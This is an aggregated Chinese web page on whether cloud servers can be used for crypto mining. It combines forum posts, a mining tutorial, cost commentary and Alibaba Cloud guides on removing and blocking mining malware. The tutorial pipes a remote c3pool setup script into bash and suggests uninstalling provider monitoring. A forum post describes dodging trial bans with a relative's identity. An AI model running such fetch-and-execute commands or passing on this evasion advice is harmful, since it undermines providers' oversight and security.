imtoken钱包下载2.0版本|阿里云允许用云主机挖矿吗
imtoken钱包下载2.0版本|阿里云允许用云主机挖矿吗
究竟云服务器能不能挖矿 - 知乎
究竟云服务器能不能挖矿 - 知乎切换模式写文章登录/注册究竟云服务器能不能挖矿松茸公主夏无敌双十一、双十二,各大云都有优惠活动,抱着试一试的心态就搞了几个。可是本人真的也没啥项目可以跑的,比较关注的就是区块链,科学上网等用途。1、 首先说说谷歌云:谷歌云有试用活动,新客户有300美元额度和90日的试用期。谷歌云的好处是可以试用高配置的机器,所谓的高配置就是8核8G内存以上的,按价格估算8核8G内存的机器150美元一月,300美元仅能够用两月。GPU,试用客户应该是不能配置的。我搞了个AMD平台的,跑CPU,能去到平均800hash。是能挖的,而且性能也达标,但谷歌的试用规则是不能挖矿的。最多给你挖半天,就封掉,原本以为8核8G太高调了,换个2和2G的低调一点,结果一样,半天!谷歌云封的是实例,不是账户,你账户依然可以开新的实例继续玩别的,并且,封了(他们叫做暂停)的实例也不会算钱。还说一下,带宽的话谷歌云是按用量计算的,计算方式还是比较复杂的,有兴趣的可以看看文档网络流量价格 | Compute Engine 文档 | Google Cloud。2、 Ucould:一个比较不知名的云商?要实名,开了两台香港的VPS,一核一G一兆仅仅够用,window系统的一年68元,Linux的三年308元。Window系统的还跑了一天CPU,没啥警告,但想着这两台用来科学上网的,就没搞了。而且这个Linux重装系统还特贵,人家阿里云系统随便装随便换都不要钱的。3、 最后是阿里云:都是双十二,年底促销等很多活动的,但试用时间都比较短,基本都只有一个月,还不如看对了直接买一年。阿里云品种比较多,什么共享型的,性能突发型的。我当初买的时候是想兼容科学上网的,比较倾向境外vps。第一次搞了一个突发性能型t6,2核2G2M,境外的就只有新加坡一地可选,128元一年。买了之后发现ssh连接都有问题,发了工单回复说可能是境外线路问题,搞啥服务都不成功。所以我才选择Ucould再搞一台香港的。后面试过Ucould科学上网成功了,这个新加坡的就暂时不用了,试试跑CPU,跑了一个星期居然没有警告?所谓的突发性能型就是限定你一般只有20%CPU性能,如果用量低了,会给你CPU积分,有积分就能跑到100%,但消耗积分,没有积分了,就只有20%的CPU性能了。所以这样跑CPU的话你可以跑一段歇一段,积攒积分。我试了一个星期白天关掉,晚上跑,白天的积分晚上两三个小时就用完了。2核2G能有多少hash,100%的时候平均200hash,20%的时候50hash左右,好过吃灰而已,今天起,我就不关了,懒得操作,看看会不会警告,不会直接封掉吧?后面再看看,活动太优惠了,刚好拿家里人的身份注册了个号,app切换账号也方便,就再开了一台1核2G1M的共享型n4,38块钱一年简直不要太便宜了,能100%使用CPU,共享型没有境外的,搞了个深圳的。跑了一晚CPU马上就出警告。难道阿里云境外和境内的安全策略不一样吗?知情的大神请解答一下哦。其实,跑CPU我猜多数云商都会检测到,处不处理,怎么对待是另一码事。现在区块链项目也很多,我想VPS还是可以跑一些例如Swarm、Meson等不太吃CPU的项目的。现在玩计算机也真好,花点小钱,都不用自己装机器就可以拥有几台服务器了,还能自学体验一把Linux那种敲命令的感觉,一句话概括我对Linux的感受就是Linux的可配置性很强,要配置什么服务网上都有很多教程,并且,好些服务只有Linux的配置教程。抛砖引玉的分享了一下最近人肉测试究竟云服务器能不能挖矿的问题,希望大家能来交流哦!发布于 2021-12-24 11:30比特币 (Bitcoin)服务器云主机赞同 8添加评论分享喜欢收藏申请
挖矿程序处理最佳实践_云安全中心(Security Center)-阿里云帮助中心
挖矿程序处理最佳实践_云安全中心(Security Center)-阿里云帮助中心
产品解决方案文档与社区权益中心定价云市场合作伙伴支持与服务了解阿里云联系我们4008013260售前咨询售后服务其他服务我要建议我要投诉备案控制台
文档产品文档输入文档关键字查找
云安全中心
产品概述
快速入门
操作指南
实践教程
开发参考
服务支持
视频专区
首页
云安全中心
实践教程
挖矿程序处理最佳实践
挖矿程序处理最佳实践更新时间:一键部署产品详情相关技术圈我的收藏
本文以挖矿程序为例,介绍云安全中心在处理挖矿病毒的事前、事中、事后所提供的安全告警、拦截查杀、溯源分析等服务。前提条件请在资产中心页面的服务器页签下,查看服务器的客户端(即云安全中心Agent)状态是否为开启,只有云安全中心客户端的状态为开启,云安全中心才能防护该服务器。如果服务器的客户端状态为暂停保护,则说明该服务器上的客户端已被关闭,云安全中心无法为该服务器提供保护。您需要为该服务器开启保护。具体操作,请参见修改服务器的保护状态。如果服务器的客户端状态为离线,则说明该服务器上尚未安装云安全中心Agent,云安全中心无法为该服务器提供保护。您需要为该服务器安装云安全中心Agent。具体操作,请参见安装Agent。如果您已为服务器成功安装云安全中心Agent,但在云安全中心控制台上该服务器的客户端状态仍为离线,您需要排查客户端离线的原因。具体操作,请参见Agent离线排查。限制条件请确保您使用的是云安全中心防病毒版、高级版、企业版或旗舰版。防病毒版、高级版、企业版或旗舰版才支持对您服务器中的挖矿程序进行处理。免费版仅支持安全告警检测,不支持安全告警处理。您可以通过购买云安全中心防病毒版、高级版或企业版来使用安全告警处理的功能。更多信息,请参见文档购买云安全中心。
点击此处立即购买云安全中心
免费试用云安全中心为阿里云账号提供7天免费试用旗舰版的活动。如果未购买过云安全中心,您可以通过申请免费试用云安全中心的旗舰版,使用旗舰版处理挖矿程序。开通免费试用云安全中心旗舰版的具体介绍,请参见文档开通7天免费试用。
点击此处免费试用云安全中心
挖矿程序的特征挖矿程序会占用CPU进行超频运算,导致CPU严重损耗,并且影响服务器上的其他应用。挖矿程序还具备蠕虫化特点,当安全边界被突破时,挖矿病毒会向内网渗透,并在被入侵的服务器上持久化驻留以获取最大收益。挖矿程序具有联动作用,在清理过程中会存在处理不及时或清理不干净导致挖矿病毒反复发生、出现恶意脚本替换系统命令的现象,从而导致执行系统命令时触发恶意脚本执行(例如:xorddos)。因此,需要在挖矿程序的一个执行周期内,尽快将被入侵服务器上的木马程序和持续化后门清理干净,否则容易导致挖矿病毒频繁复发。如何判断资产中是否存在挖矿威胁如果您服务器的CPU使用率明显升高,例如达到80%以上,并且出现未知进程持续向外发送网络包的情况,可以判定您的服务器中存在挖矿威胁。详细内容,请参见如何判断资产中是否存在挖矿威胁?云安全中心用户处理挖矿程序登录云安全中心控制台安全告警页面。在安全告警列表中定位到挖矿程序,单击操作列的处理。当出现挖矿事件时,云安全中心会产生挖矿程序的告警事件。重要 强烈建议您在控制台出现告警事件、或安全治理通知后,使用病毒查杀功能清理隐藏、持久化的恶意文件。具体操作,请参见病毒查杀。对确认需要查杀的挖矿程序,选中病毒查杀,然后选中隔离该进程的源文件、结束该进程的运行,并单击立即处理,防止该程序再次启动。云安全中心支持同时处理相同告警功能,如果您想批量处理相同规则或类型触发的告警,您可以选中同时处理相同告警使用此功能。对挖矿事件产生的其他衍生告警(例如:矿池通信行为),执行阻断操作。云安全中心通过生成对应的策略防止服务器访问矿池,确保您有充足的时间对安全事件进行处理。您也可以手动将矿池IP加入安全组禁用。查看进程行为异常告警,确认是否存在异常的计划任务。开启病毒拦截功能。针对无法及时清理服务器上残留的挖矿程序或清理不干净导致复发的情况,云安全中心提供的病毒拦截功能可对挖矿程序进行精准拦截,在事前抑制挖矿事件的发生。如何开启病毒拦截功能,请参见主动防御。您可以使用云安全中心的病毒防护功能扫描您的资产,病毒扫描的结果会显示在安全告警处理页面。另外,病毒扫描将清理恶意文件的一些持久化行为,例如:自启动项、定时任务。具体操作,请参见病毒查杀。说明 病毒扫描结束后,请及时处理安全告警页面上报的告警事件,以确保您服务器的安全。您还可以通过云安全中心提供的入侵溯源功能,详细了解挖矿程序入侵的过程和链路。非云安全中心用户处理挖矿程序挖矿程序为了最大程度获取利益,会存放大量的持久化后门,导致病毒杀不死或难以清理。如果您在未购买云安全中心服务的情况下遇到挖矿病毒,可以采取如下措施排查和处理。Linux系统执行以下命令查看挖矿进程的执行文件链接。ls -l /proc/xxx/exe // xxx表示该进程的PID。清除挖矿进程的执行文件。在高CPU消耗的进程中定位到挖矿进程,并关闭该进程。检查并清除您服务器的防火墙中存在挖矿程序的矿池地址。执行以下命令查看是否存在业务范围之外的可疑通信地址和开放端口。 iptables -L -n执行以下命令清除恶意矿池地址。 vi /etc/sysconfig/iptables执行以下命令排查是否存在定时任务。crontab -l您可以根据排查的结果,对可疑的定时任务文件进行处理,防止二次入侵。执行以下命令检查SSH公钥中是否存在挖矿病毒,防止出现持续后门。cat .ssh/authorized_keys查看其他服务器中是否存在挖矿行为,防止挖矿病毒重复感染内网中的其他服务器。Windows系统 在PowerShell中执行以下命令,通过CPU占用情况排查可疑的挖矿进程。 ps | sort -des cpu
While(1) {ps | sort -des cpu | select -f 15 | ft -a; sleep 1; cls}执行以下命令,查看挖矿进程的磁盘文件、进程启动命令的参数。wmic process where processid=xxx get processid,executablepath,commandline,name //xxx表进程pid结束挖矿进程,清除挖矿文件。执行以下命令,检查主机连接的可疑网络端口。netstat -ano | findstr xxx // xxx 表可疑的网络端口执行以下命令,检查服务器中hosts文件是否存在挖矿程序的矿池地址。type C:\Windows\System32\drivers\etc\hosts执行以下命令,排查是否存在挖矿程序设定的计划任务。schtasks /query其他方案如果病毒入侵较深,关联到系统底层组件,很难手动排查和清除。强烈建议您在备份重要数据后,重置服务器的系统,可确保完全清理挖矿程序。操作步骤如下:创建快照备份服务器上的重要数据。具体操作,请参见创建一个云盘快照。初始化服务器的操作系统。具体操作,请参见重新初始化系统盘。使用快照生成云盘。具体操作,请参见使用快照创建云盘。挂载云盘到重装系统后的服务器上。具体操作,请参见挂载数据盘。同时,阿里云也提供安全应急响应服务,由专业的安全技术人员来帮助您解决,应急响应可提供的内容如下:帮您全面清理系统中存在的木马、病毒、异常账号、异常文件、WebShell、暗链等。分析黑客入侵手法,查找入侵原因。指导用户进行安全加固。应急响应服务的详细信息,请参见应急响应服务。
反馈本页导读 (1)文档反馈
为什么选择阿里云什么是云计算全球基础设施技术领先稳定可靠安全合规分析师报告产品和定价全部产品免费试用产品动态产品定价价格计算器云上成本管理解决方案技术解决方案文档与社区文档开发者社区天池大赛培训与认证权益中心免费试用高校计划企业扶持计划推荐返现计划支持与服务基础服务企业增值服务迁云服务官网公告健康看板信任中心关注阿里云关注阿里云公众号或下载阿里云APP,关注云资讯,随时随地运维管控云服务售前咨询:95187-1售后服务:400-80-13260法律声明Cookies政策廉正举报安全举报联系我们加入我们阿里巴巴集团淘宝网天猫全球速卖通阿里巴巴国际交易市场1688阿里妈妈飞猪阿里云计算AliOS万网高德UC友盟优酷钉钉支付宝达摩院淘宝海外阿里云盘饿了么© 2009-2024 Aliyun.com 版权所有 增值电信业务经营许可证: 浙B2-20080101 域名注册服务机构许可: 浙D3-20210002 京D3-20220015浙公网安备 33010602009975号浙B2-20080101-4
为什么很多云服务器商允许跑深度学习却禁止挖矿呢? - 知乎
为什么很多云服务器商允许跑深度学习却禁止挖矿呢? - 知乎首页知乎知学堂发现等你来答切换模式登录/注册服务器云主机挖矿云计算平台深度学习(Deep Learning)为什么很多云服务器商允许跑深度学习却禁止挖矿呢?是因为挖矿这个行为相比深度学习而言会对机器造成更大伤害吗?显示全部 关注者43被浏览85,499关注问题写回答邀请回答好问题 1添加评论分享8 个回答默认排序吴德承 关注因为正经挖矿的,都不懂进化到第几代,从CPU、GPU到FPGA,甚至专用ASIC芯片。楼主可以去“比特大陆”网站看下,那是卖矿机的。谁会去用云服务器vCPU效率这么低的方案?基本上是黑客!入侵客户云服务器,植入木马,盗用别人资源来挖矿。作为云服务商,肯定有必要对客户进行安全提醒。当然,如果客户自己在上面跑挖矿程序,或AI应用,确实不关云服务商事。编辑于 2019-06-09 19:00赞同 656 条评论分享收藏喜欢收起I老蔡人潮人海中是你是我,装作正派面带笑容,不必过分多说自己清楚,你我到底想要做些什么 关注禁止???不禁止啊, 关键是傻子才用那个挖! 能挖回租金来就算我输.人家现在连显卡矿机都快撑不下去到处找便宜的电场了, 甚至专用芯片的矿机都出来了, 那个效率抵得上十块显卡. 你用云服务器挖矿???除非你家有矿才会这么玩.发布于 2019-06-10 23:57赞同 1610 条评论分享收藏喜欢
阿里云服务器可以挖矿吗?如何用用闲置云服务器挖矿教程 - 云服务器网
阿里云服务器可以挖矿吗?如何用用闲置云服务器挖矿教程 - 云服务器网
云服务器网:购买云服务器和VPS必上的网站!
云测速 | 站长工具箱 | 小爱AI助手 |
云市场大全 | 合作赞助 | 给我投稿
云服务器
腾讯云服务器
阿里云服务器
百度云服务器
金山云服务器
华为云服务器
易探云服务器
京东云服务器
海外云服务器
VPS主机
国内vps主机
香港vps主机
美国vps主机
韩国vps主机
日本vps主机
新加坡vps主机
台湾vps主机
欧洲vps主机
独立服务器
国内服务器
香港服务器
美国服务器
台湾服务器
韩国服务器
日本服务器
欧洲服务器
新加坡服务器
免费资源
免费源码
免费模板
免费插件
实用软件
免费建站
免费云主机
知识大全
VPS教程
虚拟主机
域名知识
主机评测
建站知识
CDN加速
服务器安全
服务器知识
技术文档
主题模板
IDC推荐
搜索
收起
搜索
阿里云
腾讯云
百度云
华为云
金山云
天翼云
易探云
京东云
UCloud
亚马逊云
阿里云服务器可以挖矿吗?如何用用闲置云服务器挖矿教程
阿里云
yuntue
2021年5月21日
评论
阿里云服务器可以挖矿吗?最近接触了挖矿,用阿里云服务器试着挖了一天,现在来计算下,用云服务器挖矿到底能不能赚钱…
阿里云服务器可以挖矿吗?最近接触了挖矿,用阿里云服务器试着挖了一天,现在来计算下,用云服务器挖矿到底能不能赚钱。要说明的是,挖的是门罗币(XMR),在蚂蚁矿池挖的,首先看下一天24小时全速挖矿的成果。
挖的门罗币(XMR),虽然比起比特币根本不是一个量级的,但是也给本来就不需要用的闲置云服务器找了个活路。一般,我们购买云服务器最好以新用户身份购买,如果没有新用户资格就不要买云服务器挖矿了,因为肯定会亏本,但是用99元/年的云服务器尝试还是可以的!
24小时共挖得门罗币:0.00004989XMR。
那么按照这个速度,服务器挖矿一年可以得到多少个门罗币?我们计算下。
0.00004989 * 365 = 0.01820985
所以云服务器全速挖矿一年,理论上可以挖到0.01820985个门罗币。
教程也是论坛看见的,第一次觉得论坛那么有用…
1、先注册XMR钱包
到这个网站注册:https://wallet.mymonero.com/
2、找矿池安装挖矿程序到轻量服务器
教程里面是:https://c3pool.com/cn/
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 你的XMR地址
把上面代码复制到服务器里面去执行就行了。
3、限制cpu占用(可选)
腾讯、阿里云这种大厂不管挖矿到,你买到就是100%cpu限制使用,所以没事,当然如果真的担心,就限制下。
yum install cpulimit -y
#安装cpulimit
top
#查看挖矿程序到pid
cpulimit -l 80 –pid ***
#限制pid,后面***就是你挖矿程序具体到pid数字
之后登录https://c3pool.com/cn/ ,输入自己XMR钱包地址,等一会就可以看见收益了。
注:也可以先卸载轻量服务器里面的官方监控、然后矿池也不是一直稳定的,但是一般出事了,矿池会赔偿。
我还有2台矿工是阿里云和华为云的,华为云也是参加开发者活动送的代金券买了7个月还是8个月的服务器,阿里云是很久以前的机器了,还剩下2个月到期,就也来挖矿了。
本文来源:https://www.yuntue.com/post/23903.html | 云服务器网,转载请注明出处!
继续浏览有关: 云挖矿靠谱吗 云服务器可以挖矿 云服务器可以挖矿吗 云服务器挖矿 云服务器挖矿原理 云服务器挖矿收入 云服务器挖矿教程 云服务器挖矿赚钱 云服务器挖矿靠谱吗 云服务器能挖矿吗 如何用服务器挖矿 怎么用云服务器挖矿 普通服务器挖矿 普通服务器挖矿收益 服务器挖矿效率 租用云服务器挖矿 闲置云服务器挖矿 闲置云服务器挖矿教程 阿里云可以挖矿吗 阿里云服务器可以挖矿吗的文章
给这篇文章的作者打赏
微信扫一扫打赏
支付宝扫一扫打赏
×
打赏
关于作者: yuntue
云服务器(www.yuntue.com)是一家专门做阿里云服务器代金券、腾讯云服务器优惠券的网站,这里你可以找到阿里云服务器、腾讯云服务器等国内主流云服务器优惠价格,以及海外云服务器、vps主机等优惠信息,我们会为你提供性价比最高的云服务器和域名、数据库、CDN、免费邮箱等企业常用互联网资源。
为您推荐
阿里云一键部署幻兽帕鲁服务器 8人玩版最低仅需24.83元/月
阿里云域名优惠包重磅上线!更有限时续费优惠!
《幻兽帕鲁》爆火,玩家在阿里云上部署联机服务器:全程仅3分钟
《幻兽帕鲁》横空出世 引发腾讯云和阿里云新一轮价格战
阿里云存储:存享优惠,阿里云对象存储OSS,500GB,118元/年
阿里云国际版账号2024最新注册教程:没有海外信用卡如何注册?
发表回复 取消回复您的电子邮箱地址不会被公开。 必填项已用*标注评论 * 显示名称 *
电子邮箱地址 *
网站地址
在此浏览器中保存我的显示名称、邮箱地址和网站地址,以便下次评论时使用。
互动交流
粉丝QQ交流一群:2676698
广告赞助联系QQ:38931461
唯一投稿邮箱:点击投稿
● 腾讯云新企业1元注册.com域名
● 腾讯云企业建站1元钱
● 腾讯云全球购(海外免备案服务器)
● 腾讯云校园服务器2核4G3M,468元/年
● 腾讯云上云回馈专场:云产品5折起
● 阿里云万网域名1元购活动
● 阿里云续费/升级代金券领取
● 阿里云网站建设低至500元起
● 阿里云商标顾问注册680元起
● 阿里云老用户自定义购买3.5折
近期文章
UCloud:新春采购活动,香港/美国/新加坡vps,2核/2G/30M/600G流量,仅139元/月起
易探云:台湾ISP家宽vps,1核/1G内存/20G SSD/1000M带宽/6T流量,仅168元/月起
便宜的香港vps云服务器:7款香港便宜vps主机推荐
莱卡云:美国CN2 GIA云服务器,2核/1G/20M,仅38元/月(附美国vps测评)
HostingViet年初大促销:越南vps服务器6折起,仅需16元/月起
宝塔自动检测状态,并重启PHP、Redis、MySQL、Nginx服务
触摸云:香港CN2/美国高防/日本CN2,2核/2G/10M带宽,仅380元/年起
pacificrack正式跑路,大家快抓紧备份数据!
OneTechCloud易科云:美国4837 vps、香港CN2 VPS,1核/1G内存低至30元/月起
咕咕云:沪日IPLC、中港IPLC,2核/4G内存/200M带宽/2T流量,仅899元/月起
近期评论Wpthems发表在《Ripro8.7破解版-WordPress日主题v8.7完整无限制版下载》哈哈发表在《智简魔方:魔方云系统添加镜像模板(镜像安装)》王光卫博客发表在《网上购买亚马逊云服务器》破解WP发表在《wordpress编辑器插件:Classic Editor编辑器下载》破解WP发表在《WordPress备份插件推荐:备份数据避免网站出错最有效的方法》YUNTUE.COM Inc. 云服务器网 浙ICP备12016336号-20
©CopyRight 2019- 2022 YUNTUE.COM Inc All Rights Reserved 云服务器网(yuntue.com)浙ICP备12016336号-20
浙公网安备33080002000115
返回顶部
云服务器导购
仿站建站技术
微信二维码
云服务器挖矿合理吗?可能性有几何? - 知乎
云服务器挖矿合理吗?可能性有几何? - 知乎首发于互联网知识科普切换模式写文章登录/注册云服务器挖矿合理吗?可能性有几何?YINGSOO影速科技知乎粉丝可享影速云主机8折!看个人简介截止2021年4月份,比特币在14日创下历史新高,收盘价为59974.5USD。自2015年以来,币圈的爆火也带动了比特币挖矿这个特殊产业的兴起,并席卷了硬件市场,特别是高性能的显卡,一度被“矿工”买断货,游戏发烧友们苦不堪言。不仅如此,随着显卡供应量的短缺和挖矿市场的高渴求度,“矿工”们便将视线转移到了其他领域,不少“矿工”开始尝试使用云服务器进行挖矿,那么这种方式行得通吗?本文将带大家找到答案,并与大家一起回顾比特币挖矿历史。首先我们来具体了解一下什么是比特币挖矿: 但凡你了解过比特币,就一定听说过“挖矿”这个字眼。这里所说的挖矿可不是挖煤矿、金矿,而是存在于虚拟网络中的一种特殊代码,由于其数量固定和不可复制性,慢慢变成互联网人追捧的一种带有金融交易属性的东西,按照目前的状况来看,说它是一种“货币”也毫无问题,由于其特殊的金融价值,被圈内人视为“金矿”。而比特币挖矿,就是在互联网中挖到这些宝贝。 当然比特币的数量是有限的,具有极强的稀缺性。他的总数量为2100万枚,不少经济学家为此争论了不少时间。从诞生开始该货币系统曾在4年内只有不超过1050万个,之后的总数量将被永久限制在约2100万个。比特币挖矿原理是怎样的? 比特币(Bitcoin)的概念最初由中本聪在2008年11月1日提出,并于2009年1月3日正式诞生。根据中本聪的思路设计发布的开源软件以及建构其上的P2P网络。比特币是一种P2P形式的虚拟的加密数字货币。点对点的传输意味着一个去中心化的支付系统。 专业解释是计算机hash(哈希或散列函数)随机碰撞的过程。简单一点说,就是比特币系统出一道数学题,看谁家挖矿设备先有解。因此可以将比特币挖矿看作是一场军备竞赛,谁的实力更强,谁就更有可能获得更多资源。 而比特币矿机则是一种专用于挖比特币的硬件设备,这类设备一般装有专业的挖矿芯片,通常采用安装大量显卡的方式工作,耗电量较大。计算机下载挖矿软件然后运行特定算法,与远程服务器通讯后可得到相应比特币,是获取比特币的方式之一。为什么矿工都喜欢用显卡挖矿? 因为早期比特币显卡挖矿效率远远高于CPU,相较于CPU的复杂运算,显卡内部的GPU进行的是通用计算。因此可以堆叠成百上千个流处理器,每一个流处理器就像是一个个小小的CPU,虽然其运行复杂程序的能力远远没有CPU来的给力,但架不住流处理器多,因此实际性能尤其是单精度浮点性能要比CPU强得多。 随着云技术的不断发展,云服务器的知名度越来越高。云服务器基于云计算技术,采用高端服务器进行部署,同时采用集中的管理与监控。基于集群服务器,拥有更强的服务器性能,甚至强于部分独立服务器。因此会有不少币圈人士会产生疑问:既然云服务器如此强悍,那是不是意味着它可以用来“挖矿”呢?直接开门见山给出结论:可以挖,但不合适,也不建议。 小编为大家举个例子:iPhone 12搭载了先进的摄像头,可以拍摄4K 120帧率的视频,那么它可以用来做行车记录仪吗?当人可以,但有人会这样做吗?我相信不会有人这样干,毕竟某宝上面几百块的行车记录仪有一大把,犯不着花几千块买个苹果手机来作为行车记录仪使用。 接下来,小编将从几个方面分析,大家看完就明白了。 1、云服务器和挖矿币种的分析。 云服务器的种类有很多,但很少有GPU类型的云服务器。目前市场上的各种虚拟币算法也分两类,GPU友好型和CPU有好型。比特币以太坊,莱特币等绝大多数币种都属于GPU友好型,CPU友好型比较少。所以这样一来,在服务器和币种的选择问题上,方向很清晰:CPU和GPU任何一个方向,选择算力性价比最高的云服务器和挖矿收益最高的币种。 按照云服务器的作用来看,并不需要很强的GPU算力,所以云服务器通常是CPU强劲,但GPU是一大软肋。因此使用云服务器挖矿就不必指望他在GPU算力方面有多大优势了。 2、云服务器挖矿的成本收益分析。 成本构成:挖矿的成本主要有三项,矿机的支出,电费,场地及相关管理费用;收益构成:挖矿的收益主要来自两个方面,一是按照当前数字货币的法币价格可以不管成本而获得的收益,二是数字货币在未来增值获得的收益。很多人会想,云服务器的运算能力虽然远远低于实体矿机,但是不用支付电费,这是最大的成本节省,另外,由于不需要场地,自己远程管理,场地和管理费用也趋近于零。 但你要知道,云服务器的价格并不便宜,虽然不需要电费和场地,但羊毛出在羊身上,这些成本服务商早已算进了售价之中。总得来说就是相当不划算。 3、关于云服务器挖矿的风险分析 目前来看,用云服务器挖矿服务器的价格是预付的,并且是固定的,所以挖矿是否有收益,取决于目前的虚拟货币的价格。就目前市场来看,收益还是很可观的。近期的风险来自于币价的下跌,远期的风险来看,就是绝大多数云服务器商会禁止挖矿行为。影速科技对于挖矿的行为也是禁止的。在搜索服务器挖矿相关知识的时候,也发现有国外的服务器禁止挖矿。如果被发现,服务商可以无条件终止合作并不退换款项。 目前虚拟币挖矿已经影响了显卡、内存、硬盘的正常供给和销售,还消耗了大量的电力(其实我真觉得是浪费),感觉挖矿已经到头了,如果不赶紧自己矿难,要迎来政策干预了。比特币或者其他虚拟货币本身并不是什么不能忍受不能存在的东西,但是一个挖矿,一个暴涨暴跌引发的狂热投资潮都会刺激各国当局。如消耗电力和中欧的减碳政策都是矛盾的,尤其是越往后可以想见消耗的电力总规模越高。 另外也向那些想要投机比特币赚钱的人提个醒:比特币本质上是一种击鼓传花的游戏,只有在乌托邦式的社会场景中才可能被真正认可,按目前的社会接受度以及政府的态度来看,比特币、区块链的合规化还有很长一段路要走。 本文有影速科技YINGSOO原创,侵权必究!发布于 2021-04-23 09:16挖矿数字货币比特币 (Bitcoin)赞同 71 条评论分享喜欢收藏申请转载文章被以下专栏收录互联网知识科普归纳互联网常用知识,涵盖服务器相关
防御挖矿程序的最佳实践_云防火墙(Cloud Firewall)-阿里云帮助中心
防御挖矿程序的最佳实践_云防火墙(Cloud Firewall)-阿里云帮助中心
产品解决方案文档与社区权益中心定价云市场合作伙伴支持与服务了解阿里云联系我们4008013260售前咨询售后服务其他服务我要建议我要投诉备案控制台
文档产品文档输入文档关键字查找
云防火墙
产品概述
快速入门
操作指南
实践教程
开发参考
服务支持
视频专区
首页
云防火墙
实践教程
攻击防护最佳实践
防御挖矿程序最佳实践
防御挖矿程序最佳实践更新时间:一键部署产品详情相关技术圈我的收藏
云防火墙通过对云上进出网络的恶意流量进行实时检测与阻断,可以防御挖矿蠕虫。本文以云上环境为例,从挖矿蠕虫的防御、检测和入侵后如何迅速止血三方面来介绍如何结合阿里云云防火墙和云安全中心全方位抵御挖矿蠕虫。限制条件云防火墙版本限制请确保您使用的是云防火墙高级版、企业版或旗舰版。高级版、企业版或旗舰版才支持检测或防御挖矿蠕虫,免费版不支持。您可以通过购买云防火墙高级版、企业版或旗舰版来检测或防御挖矿蠕虫。更多信息,请参见购买云防火墙服务。云安全中心版本限制云安全中心不同版本支持的功能有差异,详细介绍,请参见功能特性。挖矿程序的特征挖矿程序会占用CPU进行超频运算,导致CPU严重损耗,并且影响服务器上的其他应用。挖矿程序还具备蠕虫化特点,当安全边界被突破时,挖矿病毒会向内网渗透,并在被入侵的服务器上持久化驻留以获取最大收益。挖矿程序具有联动作用,在清理过程中会存在处理不及时或清理不干净导致挖矿病毒反复发生、出现恶意脚本替换系统命令的现象,从而导致执行系统命令时触发恶意脚本执行(例如:xorddos)。因此,需要在挖矿程序的一个执行周期内,尽快将被入侵服务器上的木马程序和持续化后门清理干净,否则容易导致挖矿病毒频繁复发。挖矿蠕虫是如何传播根据阿里云安全团队发布的《2018年云上挖矿分析报告》显示,过去一年中,每一波热门0 Day漏洞出现都伴随着挖矿蠕虫的爆发性传播。挖矿蠕虫可能因为占用系统资源导致业务中断,甚至还有部分挖矿蠕虫同时会捆绑勒索病毒(如XBash等),给企业带来资金与数据的损失。阿里云安全团队分析发现,云上挖矿蠕虫主要利用网络上普遍存在的以下漏洞进行传播:通用漏洞利用过去一年挖矿蠕虫普遍会利用网络应用上广泛存在的通用漏洞(如配置错误、弱密码、SSH、RDP、Telnet爆破等),对互联网持续扫描和攻击,以对主机进行感染。0 Day、N Day漏洞利用0 Day、N Day在网络上未被修复的窗口期也会被挖矿蠕虫利用,迅速进行大规模的感染。挖矿蠕虫防御方案防护阶段防护方案相关操作事前阶段通过云防火墙的访问控制功能,设置访问控制策略,仅放行可信流量。创建出方向访问控制策略,对可信的外网IP进行放行,而对其他IP访问全部拒绝。相关内容,请参见访问控制策略。通过在云防火墙中开启威胁引擎开关,及时阻断挖矿行为。使用云防火墙防御挖矿蠕虫通过云防火墙的入侵防御功能,有效检测并拦截攻击流量。入侵防御通过云安全中心的主动防御功能,自动拦截常见病毒、恶意网络连接和网站后门连接,抑制云服务器上挖矿事件的发生。病毒防御通过云安全中心的安全告警处理功能,检测云服务器中是否有运行挖矿程序、矿池通信行为。查看和处理安全告警事中阶段通过云防火墙的失陷感知功能快速检出挖矿蠕虫。在失陷感知页面,可以定位到列表中具体事件和外联地址。详细内容,请参见使用云防火墙检测挖矿蠕虫。通过云防火墙入侵防御功能快速止血。开启云防火墙的基础防御开关,对恶意文件下载进行阻断。详细内容,请参见入侵后如何使用云防火墙快速止血。通过云防火墙访问控制策略阻断挖矿连接。创建出方向访问控制策略,对可信的外网IP进行放行,将对矿池地址的访问设置为拒绝。云防火墙ATT&CK最佳实践。云防火墙提供的基础规则、虚拟补丁、威胁情报等功能覆盖ATT&CK各类风险,建议参考云防火墙基于Att&CK的最佳实践,对您的网络安全进行加固。事后阶段使云安全中心对挖矿病毒进行攻击溯源。查看攻击源分析结果如果在7天内,未出现挖矿通信感知及告警,说明挖矿病毒或者木马清理完毕。关于查询结果,请参见失陷感知。使用云防火墙防御挖矿蠕虫通用漏洞的防御针对挖矿蠕虫对SSH、RDP等进行暴力破解的攻击方式,云防火墙的基础防御支持常规的暴力破解检测方式,如通过登录或试错频次阈值计算,对超过试错阈值的行为进行IP限制,在您的访问习惯、访问频率的基础上,结合行为模型,保证您正常访问不被拦截的同时对异常登录进行限制。针对通用的漏洞利用方式(如利用Redis写Crontab执行命令、数据库UDF进行命令执行等),云防火墙的基础防御基于阿里云的大数据优势,利用阿里云安全在云上攻防对抗中积累大量恶意攻击样本,形成精准防御规则。您可通过开启云防火墙的基础防御来防御通用漏洞。具体操作如下:登录云防火墙控制台。在左侧导航栏,选择攻击防护 > 防护配置。在防护配置页面,定位到威胁情报区域,开启威胁引擎运行模式开关。在高级设置区域,开启基础规则开关。在左侧导航栏,选择攻击防护 > 入侵防御,在入侵防御页面的详细数据列表中查看详细的拦截日志。0 Day、N Day漏洞防御热门0 Day、N Day漏洞修复不及时,被挖矿蠕虫利用感染的风险较大。云防火墙利用全网部署的蜜罐分析异常攻击流量或利用阿里云先知平台获取漏洞情报,可及时发现针对0 Day、N Day的漏洞,获取漏洞PoC或Exp,并落地形成虚拟补丁,在与黑客的攻防对抗中占得时间先机。您可通过开启云防火墙的虚拟补丁来防御0 Day、N Day漏洞。具体操作如下:登录云防火墙控制台。在左侧导航栏,选择攻击防护 > 防护配置。在高级设置区域,开启虚拟补丁开关。单击开启补丁右下方的自定义选择。在虚拟补丁管理对话框,查看或管理已开启的虚拟补丁信息。使用云防火墙检测挖矿蠕虫在与蠕虫攻防对抗中,即使在公网边界做好入侵防御措施,仍有可能感染挖矿蠕虫。例如挖矿蠕虫可以通过VPN直接由开发机传播到生产网;用于运维的系统镜像、Docker镜像已经被植入挖矿病毒,从而导致大规模感染爆发。云防火墙通过NTA(Network Traffic 